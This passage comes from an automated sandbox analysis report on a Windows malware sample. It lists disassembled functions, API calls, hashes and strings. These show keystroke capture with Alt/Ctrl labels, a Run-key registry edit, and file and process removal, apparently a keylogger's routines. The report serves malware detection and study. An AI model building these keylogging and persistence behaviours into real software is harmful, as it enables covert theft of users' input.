                                                          • Associated: 00000001.00000002.3753278972.0000000000458000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000001.00000002.3753301179.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000001.00000002.3753301179.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000001.00000002.3753337251.0000000000477000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_1_2_400000_1736491685b40eefbc9bdfbc98216071e6ff3a4c19c7e1ab8a144cde35036665da8534.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: State$KeyboardUnicodeWindow$EventForegroundLayoutProcessThread
                                                          • String ID: [AltL]$[AltR]
                                                          • API String ID: 2738857842-2658077756
                                                          • Opcode ID: 013d8eb75564844e77d0a130007ea633e5b9443d2c6b05f924e9c22f592720ae
                                                          • Instruction ID: 4c389cf0edc94a27bb3bc0fddc987b72c0da48b50f0a0a77cbfc03dd010ffeca
                                                          • Opcode Fuzzy Hash: 013d8eb75564844e77d0a130007ea633e5b9443d2c6b05f924e9c22f592720ae
                                                          • Instruction Fuzzy Hash: 9AE09B2134032117C898323EA91B6EE3A218F82F65B80016FF8427BADADD7D4D5043CF
                                                          Function 00448A13 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 28COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • _free.LIBCMT ref: 00448A35
                                                            • Part of subcall function 00446CD5: RtlFreeHeap.NTDLL(00000000,00000000,?,0044FC60,0000000A,00000000,0000000A,00000000,?,0044FF04,0000000A,00000007,0000000A,?,00450415,0000000A), ref: 00446CEB
                                                            • Part of subcall function 00446CD5: GetLastError.KERNEL32(0000000A,?,0044FC60,0000000A,00000000,0000000A,00000000,?,0044FF04,0000000A,00000007,0000000A,?,00450415,0000000A,0000000A), ref: 00446CFD
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.3753238214.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000001.00000002.3753223092.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000001.00000002.3753278972.0000000000458000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000001.00000002.3753301179.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000001.00000002.3753301179.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000001.00000002.3753337251.0000000000477000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_1_2_400000_1736491685b40eefbc9bdfbc98216071e6ff3a4c19c7e1ab8a144cde35036665da8534.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: ErrorFreeHeapLast_free
                                                          • String ID: 8@$8@
                                                          • API String ID: 1353095263-3408345419
                                                          • Opcode ID: 9a963da6b0d453c70d37714207bd95daf40472698ea915a46c6a843fe12f4396
                                                          • Instruction ID: 8fe4af4b93ebf6b2b13329648f525de20a5552277f2be9521e73d3219e6c2dc0
                                                          • Opcode Fuzzy Hash: 9a963da6b0d453c70d37714207bd95daf40472698ea915a46c6a843fe12f4396
                                                          • Instruction Fuzzy Hash: 01E092361003059F8720CF6DD400A86B7F4EF95720720852FE89EE3710D731E812CB40
                                                          Function 0040ADB0 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 24keyboardCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • GetKeyState.USER32(00000012), ref: 0040ADB5
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.3753238214.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000001.00000002.3753223092.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000001.00000002.3753278972.0000000000458000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000001.00000002.3753301179.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000001.00000002.3753301179.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000001.00000002.3753337251.0000000000477000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_1_2_400000_1736491685b40eefbc9bdfbc98216071e6ff3a4c19c7e1ab8a144cde35036665da8534.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: State
                                                          • String ID: [CtrlL]$[CtrlR]
                                                          • API String ID: 1649606143-2446555240
                                                          • Opcode ID: 4cd3fd2045822c407c10e6f4791885f4ed8356674f4e2c80592f01f7e92f4c5a
                                                          • Instruction ID: c178b64a75e50e2fccb38c9379e001e6e5e0f6b670105b82eaba8ba361dc1658
                                                          • Opcode Fuzzy Hash: 4cd3fd2045822c407c10e6f4791885f4ed8356674f4e2c80592f01f7e92f4c5a
                                                          • Instruction Fuzzy Hash: 59E0866170031517C514363DD61B67F39128F41B66F80012FF842A7AC6ED7E8D6423CB
                                                          Function 00412A52 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 23registryCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • RegOpenKeyExW.ADVAPI32(80000002,Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\,00000000,00000002,?,80000002,80000002,0040BFB2,00000000,004752F0,00475308,?,pth_unenc), ref: 00412A60
                                                          • RegDeleteValueW.ADVAPI32(?,?,?,pth_unenc), ref: 00412A70
                                                          Strings
                                                          • Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\, xrefs: 00412A5E
                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.3753238214.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000001.00000002.3753223092.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000001.00000002.3753278972.0000000000458000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000001.00000002.3753301179.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000001.00000002.3753301179.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000001.00000002.3753337251.0000000000477000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_1_2_400000_1736491685b40eefbc9bdfbc98216071e6ff3a4c19c7e1ab8a144cde35036665da8534.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: DeleteOpenValue
                                                          • String ID: Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\
                                                          • API String ID: 2654517830-1051519024
                                                          • Opcode ID: 3a238ae8f5602ce2402de7cae663a0db3b4178bc362611f3100633d001d48757
                                                          • Instruction ID: 27182704b7fa20b5ed2a2764b3d23dc9a6b68b829b0f6622ee10c7d45645f89b
                                                          • Opcode Fuzzy Hash: 3a238ae8f5602ce2402de7cae663a0db3b4178bc362611f3100633d001d48757
                                                          • Instruction Fuzzy Hash: F1E01270200308BAEF204FA19E06FEB37ACAB40BC9F004169F601F5191EAB6DD54A658
                                                          Function 0043AF18 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 23COMMON
                                                          Download Yara Rule
                                                          APIs
                                                            • Part of subcall function 00448973: DeleteCriticalSection.KERNEL32(?,?,?,?,?,0046ECB8,00000010,0043AF25), ref: 004489D5
                                                            • Part of subcall function 00448973: _free.LIBCMT ref: 004489E3
                                                            • Part of subcall function 00448A13: _free.LIBCMT ref: 00448A35
                                                          • DeleteCriticalSection.KERNEL32(00645110), ref: 0043AF41
                                                          • _free.LIBCMT ref: 0043AF55
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.3753238214.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000001.00000002.3753223092.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000001.00000002.3753278972.0000000000458000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000001.00000002.3753301179.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000001.00000002.3753301179.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000001.00000002.3753337251.0000000000477000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_1_2_400000_1736491685b40eefbc9bdfbc98216071e6ff3a4c19c7e1ab8a144cde35036665da8534.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: _free$CriticalDeleteSection
                                                          • String ID: 0Qd
                                                          • API String ID: 1906768660-844494294
                                                          • Opcode ID: 71ff8b17d51679f1d22a336c43bf2a586848bbcdcff3b0266824fadac5e6ad26
                                                          • Instruction ID: c565f5be962e97e7d95751f2e11d368bfb34a8db459f84b373f63e28eeb95a6a
                                                          • Opcode Fuzzy Hash: 71ff8b17d51679f1d22a336c43bf2a586848bbcdcff3b0266824fadac5e6ad26
                                                          • Instruction Fuzzy Hash: 31E0D83280461087D6247F7DFD4195D73A4EB4D725F02042EF859B3161CE6C6CC1674D
                                                          Function 0040AF77 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 22fileCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • DeleteFileW.KERNEL32(00000000,?,pth_unenc), ref: 0040AF84
                                                          • RemoveDirectoryW.KERNEL32(00000000,?,pth_unenc), ref: 0040AFAF
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.3753238214.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000001.00000002.3753223092.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000001.00000002.3753278972.0000000000458000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000001.00000002.3753301179.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000001.00000002.3753301179.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000001.00000002.3753337251.0000000000477000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_1_2_400000_1736491685b40eefbc9bdfbc98216071e6ff3a4c19c7e1ab8a144cde35036665da8534.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: DeleteDirectoryFileRemove
                                                          • String ID: pth_unenc
                                                          • API String ID: 3325800564-4028850238
                                                          • Opcode ID: 7b845410b2c100cd84e1cb5c796077768945eb3f9586e929b361309ded2c1d61
                                                          • Instruction ID: b030a41f26c3d5f2e51690188d4bb45887e11e7cc62b1c698fc8f7347c957287
                                                          • Opcode Fuzzy Hash: 7b845410b2c100cd84e1cb5c796077768945eb3f9586e929b361309ded2c1d61
                                                          • Instruction Fuzzy Hash: 12E046715116104BC610AB32E845AEBB798AB05306F00446FE8D3B36A1DE38A948CA98
                                                          Function 00411771 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 13synchronizationCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • TerminateProcess.KERNEL32(00000000,pth_unenc,0040E748), ref: 00411781
                                                          • WaitForSingleObject.KERNEL32(000000FF), ref: 00411794
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.3753238214.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000001.00000002.3753223092.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000001.00000002.3753278972.0000000000458000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000001.00000002.3753301179.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000001.00000002.3753301179.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000001.00000002.3753337251.0000000000477000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_1_2_400000_1736491685b40eefbc9bdfbc98216071e6ff3a4c19c7e1ab8a144cde35036665da8534.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: ObjectProcessSingleTerminateWait
                                                          • String ID: pth_unenc
                                                          • API String ID: 1872346434-4028850238
                                                          • Opcode ID: 5bb4d910bf534706ca5f2b5d32154bdbdc32722f36a2c9cc9993c004b7262cc3
                                                          • Instruction ID: eef26e02e81300ba4c8cf7f61278c3f59c29627b67378ac59a4e73c1cb1fd9d7
                                                          • Opcode Fuzzy Hash: 5bb4d910bf534706ca5f2b5d32154bdbdc32722f36a2c9cc9993c004b7262cc3
                                                          • Instruction Fuzzy Hash: 24D01234145351AFD7610B60AD19F953F68E705323F108365F428512F1CFB58494AA1C
                                                          Function 0043FCA1 Relevance: 5.1, APIs: 4, Instructions: 139COMMONLIBRARYCODE
                                                          Download Yara Rule
                                                          APIs
                                                          • MultiByteToWideChar.KERNEL32(?,00000009,?,00000000,00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,?,?,00000000,00401AD8), ref: 0043FD37
                                                          • GetLastError.KERNEL32 ref: 0043FD45
                                                          • MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 0043FDA0
                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.3753238214.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000001.00000002.3753223092.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000001.00000002.3753278972.0000000000458000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000001.00000002.3753301179.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000001.00000002.3753301179.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000001.00000002.3753337251.0000000000477000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_1_2_400000_1736491685b40eefbc9bdfbc98216071e6ff3a4c19c7e1ab8a144cde35036665da8534.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: ByteCharMultiWide$ErrorLast
                                                          • String ID:
                                                          • API String ID: 1717984340-0
                                                          • Opcode ID: da5cee2afb3fc4b5b183086853f31dabd9e5fae04dd03cb90eeff65bb8952867
                                                          • Instruction ID: a8021b2984f9c2011c4d4eba480f75da6e6c35d7fa760b83b06315d7a0ea6bca
                                                          • Opcode Fuzzy Hash: da5cee2afb3fc4b5b183086853f31dabd9e5fae04dd03cb90eeff65bb8952867
                                                          • Instruction Fuzzy Hash: E1410A30E00246AFCF218F65C84867B7BA5EF09310F14517EFC5A9B2A2DB398D05C759